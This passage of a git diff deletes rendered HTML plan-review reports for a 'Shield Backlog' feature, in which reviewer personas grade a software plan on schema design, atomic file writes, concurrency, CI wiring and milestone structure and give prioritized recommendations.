-<td>AC9</td>
-<td>Estimation feasibility</td>
-<td>B</td>
-<td>Eight of ten stories are confidently estimable. EPIC-2-S2 (undefined match heuristic) and EPIC-3-S2 (match-key + drift-tolerance edge space) carry estimation uncertainty until the LLDs land. All LLD design_refs are unresolved <code>TODO</code> links — fine for a plan, but they're the exact detail an estimator wants.</td>
-</tr>
-<tr>
-<td>AC10</td>
-<td>Definition of Done alignment</td>
-<td>B</td>
-<td>Strong on tests (dedicated EPIC-4-S1 eval story with RED→GREEN, CI wiring, self-contained no-LLM fixtures) and docs (EPIC-4-S2: command + SKILL + CHANGELOG) and release (version bump per CLAUDE.md). Not stated anywhere: code review and deploy/ship-to-staging steps in the DoD. For a plugin-asset repo &quot;staging&quot; maps loosely to the marketplace bump, but review is unmentioned.</td>
-</tr>
-<tr>
-<td>AC13</td>
-<td>Milestone coverage</td>
-<td>A</td>
-<td>All three milestones have covering stories. M1: EPIC-1-S1/S2/S3/S4 + EPIC-2-S1 (5). M2: EPIC-2-S2 (1). M3: EPIC-3-S1/S2/S3 + EPIC-4-S1/S2 (5). No empty milestone.</td>
-</tr>
-<tr>
-<td>AC14</td>
-<td>Milestone reference integrity</td>
-<td>A</td>
-<td>Every story <code>milestone_id</code> is M1, M2, or M3 — all present in <code>milestones[]</code>. No null, no dangling reference. <code>milestones[]</code> non-empty.</td>
-</tr>
-<tr>
-<td>AC15</td>
-<td>Milestone exit criteria testability</td>
-<td>B</td>
-<td>Most exit criteria are testable facts (validator exits 0/non-zero with named error; atomic temp-then-rename; &quot;a prd-only feature is NOT removed&quot;; &quot;second pass is idempotent&quot;). M2's &quot;proposes ≥1 candidate ... using a documented match&quot; leans on an undocumented match (mirrors the EPIC-2-S2 AC5/AC8 gap). M1's &quot;renders ... a research/prd/plan status read from manifest.json&quot; is verifiable. Overall testable with one soft item.</td>
-</tr>
-<tr>
-<td>AC16</td>
-<td>Milestone DAG integrity</td>
-<td>A</td>
-<td>Graph: M1→(M2), M2→(M3). Linear, acyclic, fully connected. No cycle, no dangling depends_on (M1 deps [], M2 deps [M1], M3 deps [M2]).</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> A well-structured, sprint-ready backlog with an acyclic milestone DAG and full coverage; the single recurring weakness is the undefined feature/epic suggestion-matching heuristic (EPIC-2-S2 / M2), which is still an open question and undercuts requirements clarity, sprint-readiness, and estimability for that one story.</p>
-<h4 id="story-level-assessment">Story-Level Assessment</h4>
-<table>
-<thead>
-<tr>
-<th>Story</th>
-<th>Sizing</th>
-<th>Has Context</th>
-<th>Has Requirements</th>
-<th>Has Steps</th>
-<th>Has Criteria</th>
-<th>Sprint-Ready?</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>EPIC-1-S1 · Schema + validator</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-1-S2 · Capture (user+skill) atomic write</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-1-S3 · /backlog ordered view</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-1-S4 · Manual remove</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-2-S1 · Pipeline status from manifest</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-2-S2 · Feature+epic association + suggestion</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Partial (match heuristic undefined)</td>
-<td>Partial</td>
-<td>Partial (&quot;best match&quot; not asserted)</td>
-<td>No</td>
-</tr>
-<tr>
-<td>EPIC-3-S1 · Promotion (transient reference)</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-3-S2 · Reconciliation engine</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-3-S3 · Eager + lazy triggers (idempotent)</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-4-S1 · Executable evals (RED→GREEN)</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-<tr>
-<td>EPIC-4-S2 · Version bump + docs</td>
-<td>OK</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-<td>Yes</td>
-</tr>
-</tbody>
-</table>
-<h4 id="milestone-level-assessment">Milestone-Level Assessment</h4>
-<table>
-<thead>
-<tr>
-<th>Milestone</th>
-<th>Has Covering Stories</th>
-<th>Exit Criteria Testable</th>
-<th>Depends-On Valid</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1 · Capture + store + view</td>
-<td>Yes (5: E1-S1..S4, E2-S1)</td>
-<td>Yes</td>
-<td>Yes (root, deps [])</td>
-</tr>
-<tr>
-<td>M2 · Feature + epic association + suggestion</td>
-<td>Yes (1: E2-S2)</td>
-<td>Partial (&quot;documented match&quot; undefined)</td>
-<td>Yes (deps M1)</td>
-</tr>
-<tr>
-<td>M3 · Promotion + reconciliation</td>
-<td>Yes (5: E3-S1..S3, E4-S1, E4-S2)</td>
-<td>Yes</td>
-<td>Yes (deps M2)</td>
-</tr>
-</tbody>
-</table>
-<p>Note on milestone/epic phase alignment: EPIC-2-S1 carries <code>milestone_id: M1</code> while sitting in EPIC-2 (&quot;Association &amp; pipeline status&quot;). This is <strong>intentional and correct</strong>, not a conflict — the story implements the manifest status badge, which M1's outcome explicitly includes (&quot;<code>/backlog</code> renders the ordered list ... with per-entry pipeline status from manifest.json&quot;). The epic groups by theme; the milestone groups by ship-phase. They legitimately cross here. No remediation needed.</p>
-<h4 id="recommendations">Recommendations</h4>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>AC5 / AC7 / AC8 (EPIC-2-S2)</td>
-<td>Define the feature/epic suggestion match heuristic before the story enters a sprint — specify the matching method (e.g. case-insensitive substring + token-overlap ranking on feature/epic names) and add a measurable AC such as &quot;given fixture manifest with feature <code>auth</code>, capturing text mentioning 'auth' surfaces <code>auth</code> as the top candidate.&quot; Resolve the PRD §9 open &quot;Feature/epic discovery cost&quot; question or land the TODO <code>/lld epic-suggester</code> so S2 is estimable.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC15 (M2)</td>
-<td>Tighten M2's exit criterion &quot;using a documented match&quot; — point it at the resolved heuristic above and restate as a testable fact, mirroring the M3 exit criteria's precision.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC10</td>
-<td>Add code-review and ship/staging steps to the implied Definition of Done. EPIC-4-S2 covers version bump + docs + CHANGELOG; add &quot;PR reviewed and merged; marketplace version published&quot; as an explicit DoD line so 'done' is unambiguous across the team.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC9</td>
-<td>The LLD <code>design_refs</code> for EPIC-1-S1, EPIC-1-S2, EPIC-2-S2, EPIC-3-S2, EPIC-3-S3 are all unresolved <code>TODO</code> links. Land (or stub) <code>/lld backlog-store</code>, <code>/lld epic-suggester</code>, and <code>/lld reconciler</code> before sprint start so estimators have the interface-level detail those stories reference.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Overall Persona Grade: B</strong> (point average ≈ 3.36 across 14 evaluation points — six A, eight B — rounds to B). The plan is sprint-ready with strong context, an acyclic and fully-covered milestone DAG, and testable criteria throughout. The one consistent drag is the under-specified suggestion-matching in EPIC-2-S2 / M2, which a single planning clarification (P1) would lift to A-range.</p>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html
deleted file mode 100644
index 234e66d5..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/backend-engineer.html
+++ /dev/null
@@ -1,113 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="backend-engineer--detailed-findings">Backend Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="backend-reviewer--plan-review-shield-backlog">Backend Reviewer — Plan Review: Shield Backlog</h2>
-<p><strong>Scope:</strong> plan.md, trd.md, plan.json (4 epics / 11 stories / 3 milestones), grounded against <code>shield/schema/plan-sidecar.schema.json</code> and <code>docs/shield/manifest.json</code>.
-<strong>Stack:</strong> Python (uv), JSON-schema deliverables, command/skill markdown. No framework skills apply.</p>
-<h3 id="scorecard">Scorecard</h3>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Basis</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>1</td>
-<td>Data contract / schema design</td>
-<td>B</td>
-<td><code>backlog.json</code> contract is fully specified (§11, F1, EPIC-1-S1): <code>{schema_version:int, entries:[{id, order:int, kind, source, feature, epic, text}]}</code>, draft-2020-12, named errors. Gap: <code>id</code> has no type/format/uniqueness rule, and the <code>id</code> <em>generation</em> strategy is undefined (see P1-a). <code>epic</code>/<code>feature</code> typed only as bare strings with no &quot;proposed-new vs existing&quot; discriminator.</td>
-</tr>
-<tr>
-<td>2</td>
-<td>API / interface design</td>
-<td>C</td>
-<td>The skill-facing write-helper — explicitly the carried-forward PRD-review P1 — is <strong>still open</strong> (Q3: &quot;exact function signature / module location … Resolution: lock in /lld backlog-store or at EPIC-1-S2 implementation&quot;). §11 describes it only as &quot;documented function/contract taking <code>{text, kind, feature?, epic?, source}</code>; returns the created entry id.&quot; Deferring the <em>signature</em> of the one cross-skill contract to implementation time is the central interface risk (P1-b).</td>
-</tr>
-<tr>
-<td>3</td>
-<td>File I/O correctness &amp; atomicity (N1)</td>
-<td>B</td>
-<td>Strong: temp-then-rename + validate-or-refuse, crash leaves at most <code>.tmp</code> cleaned next run, git-tracked recoverability (N1, N4, EPIC-1-S2). Gaps: (a) no <code>fsync</code>/<code>os.replace</code> durability detail — &quot;rename&quot; on POSIX via <code>os.replace</code> is atomic but the plan doesn't name the primitive; (b) <strong>no concurrency primitive named</strong> — N1 claims &quot;concurrent capture racing reconciliation must never corrupt&quot; but temp-then-rename alone does not prevent <em>lost updates</em> (two writers each read-modify-rename → last-writer-wins drops an entry). No lock/CAS/re-read-under-lock mentioned (P1-c).</td>
-</tr>
-<tr>
-<td>4</td>
-<td>Error handling</td>
-<td>A</td>
-<td>Consistently specified: named validator errors (<code>unknown_kind_enum</code>, <code>missing_required_field</code>, <code>schema_version_too_new</code>), absent-id no-op, empty-backlog message, malformed-upstream → entry-stays-with-log, never-crash (N3, F5, §9). Degradation paths are explicit and testable.</td>
-</tr>
-<tr>
-<td>5</td>
-<td>Testing strategy</td>
-<td>A</td>
-<td>EPIC-4-S1 mandates self-contained executable evals (no API/LLM) under <code>shield/evals/</code>, named fixtures (prd-only-stays, plan-committed-removed, ambiguous-stays, malformed-stays), RED→GREEN in PR, CI gate. Directly satisfies CLAUDE.md eval mandate. One missing case: no eval for the <strong>lost-update concurrency</strong> path (ties to P1-c) and none for <code>schema_version_too_new</code> migration.</td>
-</tr>
-<tr>
-<td>6</td>
-<td>Framework / idiom fit</td>
-<td>A</td>
-<td>Correct for the repo: uv-run scripts, pydantic+jsonschema, schema at <code>shield/schema/</code>, skill at <code>shield/skills/general/backlog/</code>, command at <code>shield/commands/</code>, version bump in marketplace.json + pyproject (EPIC-4-S2). Matches existing <code>validate_*</code>/<code>reconcile_*</code> script conventions.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Schema-grounding check (read-contract, N3 / §11):</strong> I verified the consumed shapes against the live files. <code>manifest.json</code> is <code>features[].{name, artifacts.{research,prd,plan_json,...}}</code> — <strong>§11 is accurate.</strong> <code>plan-sidecar.schema.json</code> has <code>epics[].{id (^EPIC-[0-9]+$), name, stories[]}</code> with <code>story.status ∈ {ready,in-progress,in-review,done,blocked}</code> — <strong>§11's <code>epics[].{id,name,stories[]}</code> is accurate.</strong> The read-contract claim is correct, which lifts N3 from a guess to a verified coupling. Good.</p>
-<hr />
-<h3 id="prioritized-recommendations">Prioritized Recommendations</h3>
-<p><strong>P1 — Important gaps (C/incomplete on important points):</strong></p>
-<ul>
-<li>
-<p><strong>P1-a · <code>id</code> contract underspecified (Eval point 1).</strong> F1 / §11 / the schema task list <code>id</code> as a required field but never define its type, format, or <strong>how it's generated</strong>. Manual-remove (<code>/backlog remove &lt;id&gt;</code>), promotion (<code>promote &lt;id&gt;</code>), and eager-prune all key off <code>id</code>, yet uniqueness and collision behavior are unstated. <em>Action:</em> in EPIC-1-S1, specify <code>id</code> type (string?), generation (uuid4 / monotonic / slug), and a uniqueness constraint in the schema. Add an AC: &quot;schema rejects duplicate <code>id</code>.&quot;</p>
-</li>
-<li>
-<p><strong>P1-b · Write-helper signature still open is a P0-shaped risk parked as Q3 (EvalPoint 2).</strong> This is the <em>exact</em> PRD-review P1 the plan claims to resolve in EPIC-1-S2, but §11 + Q3 punt the signature to &quot;/lld or implementation.&quot; Since EPIC-1-S2 is the contract <em>every capturing skill builds against</em>, an unspecified signature means downstream skills can't be written or tested against a stable shape. <em>Action:</em> lock the helper signature (name, module path, params, return, raise-on-invalid behavior) in EPIC-1-S1/S2 acceptance criteria — not deferred to LLD. At minimum pin: <code>capture(text, *, kind=&quot;task&quot;, feature=None, epic=None, source) -&gt; entry_id</code> and where it lives (<code>shield/scripts/backlog_store.py</code>?).</p>
-</li>
-<li>
-<p><strong>P1-c · Atomicity ≠ isolation; lost-update path unaddressed (EvalPoint 3, N1).</strong> N1's threat model is &quot;concurrent capture racing reconciliation.&quot; Temp-then-rename guarantees no <em>torn</em> file, but two concurrent read-modify-write cycles still silently drop one writer's entry (both read N entries, each writes N+1, second rename wins → one entry lost, no corruption flagged). The plan treats &quot;no corruption&quot; as equivalent to &quot;no data loss.&quot; <em>Action:</em> name the concurrency strategy — single-writer assumption documented as such, OR a lockfile / re-read-and-merge under exclusive open / <code>O_EXCL</code> temp. Add an eval fixture for two interleaved captures. If single-actor is the real assumption (N5 says &quot;single actor&quot;), state it explicitly in N1 and downgrade the &quot;racing reconciliation&quot; language, because eager-prune-at-end-of-/plan can genuinely run while an agent captures.</p>
-</li>
-</ul>
-<p><strong>P2 — Warnings / minor gaps on B items:</strong></p>
-<ul>
-<li>
-<p><strong>P2-a · &quot;Epic landed&quot; gate is ambiguous (EvalPoint 1/5, F7).</strong> F7 says remove &quot;when its epic's work appears in the feature's <code>plan.json</code>,&quot; EPIC-3-S2 AC says &quot;whose epic's <strong>stories</strong> appear,&quot; but the schema guarantees an epic always has <code>stories[] (minItems:1)</code> the moment it's written. So &quot;stories appear&quot; = &quot;epic exists&quot; — meaning an entry is pruned as soon as <code>/plan</code> <em>writes</em> the epic, regardless of whether any story is <code>done</code>. That may be intended (plan-committed = removed) but it's stated three slightly different ways. <em>Action:</em> state the gate as one precise predicate, e.g. &quot;epic with matching id/name is present in <code>plan.json.epics[]</code>&quot; — and explicitly note story <code>status</code> is <strong>not</strong> consulted. Removes reviewer ambiguity and pins the eval assertion.</p>
-</li>
-<li>
-<p><strong>P2-b · Proposed-new &quot;match by epic name&quot; fragility is acknowledged but not bounded (EvalPoint 2).</strong> Match key for proposed-new epics is <code>epic name</code> with &quot;names expected stable&quot; as an <em>unvalidated assumption</em> (PRD §10). The mitigation (§14: &quot;disable eager prune on repeated name collisions&quot;) is reactive. <em>Action:</em> add normalization rules to EPIC-3-S2 (case/whitespace-insensitive? exact?) and an AC for the collision case (&quot;two epics same normalized name → ambiguous → entry stays&quot;), which the &quot;ambiguous-stays&quot; fixture should already exercise — wire it explicitly to name-collision, not just structural ambiguity.</p>
-</li>
-<li>
-<p><strong>P2-c · <code>schema_version</code> migration is policy-only, no executable path (EvalPoint 1/5).</strong> The read-old/write-new policy is documented but EPIC-1-S1 only validates <code>schema_version_too_new</code> (reject). There's no migration <em>function</em> or eval for read-old. Acceptable for v1 (only one version exists), but the AC overstates (&quot;migration policy present&quot; = a doc, not code). <em>Action:</em> either add a no-op <code>migrate(doc)-&gt;doc</code> seam now with a test, or explicitly scope migration as doc-only-until-v2 in the AC so it isn't mistaken for working code.</p>
-</li>
-</ul>
-<hr />
-<h3 id="overall-persona-grade-b-30">Overall Persona Grade: <strong>B (3.0)</strong></h3>
-<p>Average of point grades: (B + C + B + A + A + A) = (3+2+3+4+4+4)/6 = 3.33 → <strong>B</strong>.</p>
-<p>The plan is well-grounded — the reconciliation read-contract is <em>verified accurate</em> against the live schemas (not assumed), error handling and testing strategy are A-grade, and the atomic-write framing is sound. It is held back from A by two important, named-but-unresolved interface/correctness gaps: the <strong>skill-facing write-helper signature is still open (Q3)</strong> despite being the headline PRD-review carry-forward, and <strong>N1 conflates atomicity with isolation</strong>, leaving the lost-update path under a &quot;single actor&quot; assumption that isn't stated where the threat is described. Resolve P1-b (lock the helper signature in EPIC-1-S1/S2 ACs) and P1-c (name the concurrency strategy + add the interleaved-capture eval) and this is an A.</p>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html
deleted file mode 100644
index fe94b8ff..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/dx-engineer.html
+++ /dev/null
@@ -1,172 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="dx-engineer--detailed-findings">DX Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h3 id="dx-engineer-review-grade-b">DX Engineer Review (Grade: B)</h3>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>DX1</td>
-<td>Plan clarity</td>
-<td>A</td>
-<td>plan.md line 6 states the goal in one sentence; TRD §2 problem statement is crisp. 30-second comprehension easily met.</td>
-</tr>
-<tr>
-<td>DX2</td>
-<td>Story actionability</td>
-<td>B</td>
-<td>All 10 stories carry tasks + AC + design_refs and reference concrete files (<code>shield/schema/backlog.schema.json</code>, <code>shield/scripts/reconcile_backlog.py</code>). EPIC-1-S2 is the weak point: the skill write-helper signature is explicitly deferred (TRD §12 Q3) — a dev cannot finalize that interface without the LLD that doesn't exist yet.</td>
-</tr>
-<tr>
-<td>DX3</td>
-<td>Implementation step detail</td>
-<td>B</td>
-<td>Strong for backend tooling: names files, the validator stack (<code>pydantic + jsonschema, run via uv</code>), named error codes (<code>unknown_kind_enum</code>, <code>schema_version_too_new</code>), JSON Schema draft (2020-12). Gaps: &quot;wire into CI&quot; (EPIC-4-S1) and &quot;render a badge line&quot; give what, not how (no CI file path, no badge-format spec beyond an example).</td>
-</tr>
-<tr>
-<td>DX4</td>
-<td>Ambiguity audit</td>
-<td>B</td>
-<td>Mostly tight. Lingering vague terms: &quot;names expected stable&quot; / &quot;assumed stable&quot; (EPIC-3-S2) is an unverified assumption baked into the match key; &quot;best match&quot; (EPIC-2-S2 task) and &quot;the candidate plan.json&quot; (plan.md L56) are undefined — no matching algorithm or tie-break rule is specified.</td>
-</tr>
-<tr>
-<td>DX5</td>
-<td>Context sufficiency</td>
-<td>A</td>
-<td>TRD §11 documents the consumed read-contract, §8 records 4 rejected alternatives with rationale, §13 links prior art, PRD §2 is a glossary. A new dev has the background to start. Verified against repo: referenced shapes and dirs exist.</td>
-</tr>
-<tr>
-<td>DX6</td>
-<td>Dependency clarity</td>
-<td>B</td>
-<td>Milestone deps are explicit (M1→M2→M3) and stories carry milestone_id. Gap: no story-level dependency graph — e.g. EPIC-3-S3 (triggers) clearly depends on EPIC-3-S2 (engine) and EPIC-3-S1 (transient reference), but that ordering is implied, not stated. EPIC-2-S1 is tagged M1 while sitting in EPIC-2 (M2), which is correct but easy to miss without an explicit note.</td>
-</tr>
-<tr>
-<td>DX7</td>
-<td>Tool &amp; access requirements</td>
-<td>B</td>
-<td><code>uv</code> is named as the runner; no credentials/accounts needed (local file, single actor — TRD §9 &quot;Secrets/auth: none&quot;). Not called out per-story, but the no-access nature is explicit, so the gap is low-impact.</td>
-</tr>
-<tr>
-<td>DX8</td>
-<td>Handoff readiness</td>
-<td>B</td>
-<td>Largely self-contained — a dev with no Slack context could start M1 today. Two handoff blockers: (1) the capture-helper signature deferred to a non-existent LLD; (2) three <code>design_refs</code> point to LLD components marked <code>TODO: link when /lld &lt;x&gt; lands</code> (backlog-store, epic-suggester, reconciler) — those links resolve to nothing today, so the deepest design detail for the hardest stories (reconciler) is not yet in any document.</td>
-</tr>
-<tr>
-<td>DX9</td>
-<td>Service boundaries</td>
-<td>A</td>
-<td>Clean separation: <code>backlog_store</code> owns atomic R/W + validation; <code>reconcile_backlog</code> is the single shared engine both triggers call (TRD §7, EPIC-3-S3 AC &quot;Eager and lazy paths call the same reconciliation engine&quot;). manifest = index, plan.json = gate is a clear, well-named ownership split. No ambiguous shared state — <code>backlog.json</code> has one writer path.</td>
-</tr>
-<tr>
-<td>DX10</td>
-<td>API &amp; data flow design</td>
-<td>A</td>
-<td>The <code>backlog.json</code> document contract is fully specified (TRD §11, F1, schema story). The consumed read-contract (<code>manifest features[].artifacts</code>, <code>plan.json epics[].stories[]</code>) is documented and I verified it matches the real manifest. Data flow diagrammed in TRD §7 and PRD §5 mermaid. Only soft spot: the skill write-helper return/signature (the one true &quot;API&quot; here) is deferred — counted under DX2/DX8.</td>
-</tr>
-<tr>
-<td>DX11</td>
-<td>Deployment strategy</td>
-<td>B</td>
-<td>For a plugin this means release/rollback, and it is addressed: TRD §14 rollback (git revert of git-tracked <code>backlog.json</code>, &quot;not invoking /backlog is a complete disable&quot;), staged safety (destructive reconciliation lands last in M3), and a documented fallback trigger (disable eager prune → manual-only). No phased rollout beyond milestone ordering, which is acceptable for internal tooling.</td>
-</tr>
-<tr>
-<td>DX12</td>
-<td>CI/CD integration</td>
-<td>C</td>
-<td>EPIC-4-S1 says &quot;wire into CI&quot; and &quot;CI runs the eval on PRs touching the backlog assets&quot; but names no workflow file, no existing CI entrypoint (e.g. which of <code>run-eval.sh</code>/<code>run-evals.sh</code>), and no path-filter mechanism. The repo has an eval runner convention the story should point at. This is the least-specified mechanical step.</td>
-</tr>
-<tr>
-<td>DX13</td>
-<td>Error handling patterns</td>
-<td>A</td>
-<td>Failure modes are enumerated and given concrete strategies: never-remove-on-doubt (F7, N3), atomic temp-then-rename + validate-or-refuse (N1), crash-mid-write leaves at most a <code>.tmp</code> cleaned next run, malformed/old upstream shapes → entry stays + logged warning (not exception), absent-id → clear no-op. This is the plan's strongest dimension.</td>
-</tr>
-<tr>
-<td>DX14</td>
-<td>Configuration management</td>
-<td>B</td>
-<td><code>output_dir</code> from <code>.shield.json</code> → <code>{output_dir}/backlog.json</code> (TRD §9). <code>schema_version</code> migration policy (read-old/write-new) is documented. No feature flags (none needed for staged-by-milestone rollout) and no secrets (none exist). Adequate for scope; not called out per-story.</td>
-</tr>
-<tr>
-<td>DX15</td>
-<td>Developer onboarding</td>
-<td>B</td>
-<td>Backlog SKILL.md is a deliverable (EPIC-1-S3, EPIC-4-S2) documenting capture/view/promote/remove + 3 triggers + match key. Gap: no local-dev/debugging guidance for the eval suite or how to run the validator/reconciler against a fixture during development — the &quot;run it locally&quot; loop is implied by <code>uv run</code> but not spelled out.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> This is a clear, architecturally sound, error-handling-first plan with verified prior art — but three <code>design_refs</code> point to LLD docs that don't exist yet (backlog-store, epic-suggester, reconciler) and the skill capture-helper signature is explicitly deferred, so the two hardest stories (capture interface, reconciler) are not yet fully handoff-ready.</p>
-<h4 id="recommendations">Recommendations</h4>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>DX8 / DX2</td>
-<td>Resolve TRD §12 Q3 before EPIC-1-S2 starts: add the skill write-helper signature (module location, parameter names/types for <code>{text, kind, feature?, epic?, source}</code>, return type = created entry id) to TRD §11 inline, OR commit to running <code>/lld backlog-store</code> first and mark EPIC-1-S2 blocked-on-LLD. Today the three <code>design_refs</code> reading <code>TODO: link when /lld &lt;x&gt; lands</code> resolve to nothing.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX4</td>
-<td>In EPIC-2-S2 and EPIC-3-S2, replace &quot;best match&quot; / &quot;names expected stable&quot; with a concrete matching algorithm: define the feature-name and epic-name match (exact? case-insensitive? normalized?), the tie-break/ambiguity rule that triggers &quot;entry stays&quot;, and what happens on epic-name rename. The match key is the core of reconciliation and is currently underspecified.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX12</td>
-<td>In EPIC-4-S1, name the CI entrypoint and path filter explicitly: which runner (<code>shield/evals/run-evals.sh</code> vs <code>run-eval.sh</code>), the workflow file to edit, and the glob that scopes &quot;backlog assets&quot; (e.g. <code>shield/{schema,scripts,skills/general/backlog}/**</code>). &quot;Wire into CI&quot; is not actionable without it.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX6</td>
-<td>Add an explicit intra-epic story dependency note for EPIC-3: S1 (transient reference) and S2 (engine) must land before S3 (triggers consume both). Currently only milestone-level deps are stated.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX3 / DX15</td>
-<td>Specify the badge render format once (EPIC-2-S1 shows <code>'research ✓ prd ✓ plan –'</code> as an example only) and add a one-line local-dev loop to the backlog SKILL.md deliverable (e.g. <code>uv run shield/scripts/reconcile_backlog.py &lt;fixture&gt;</code> to dry-run reconciliation).</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Overall persona grade: B</strong> (point average ≈ 3.4: eleven A/B-strong points; DX12 is the lone C; no Critical point graded below B, so no P0).</p>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html
deleted file mode 100644
index f2ae956d..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/product-manager.html
+++ /dev/null
@@ -1,196 +0,0 @@
-<!DOCTYPE html>
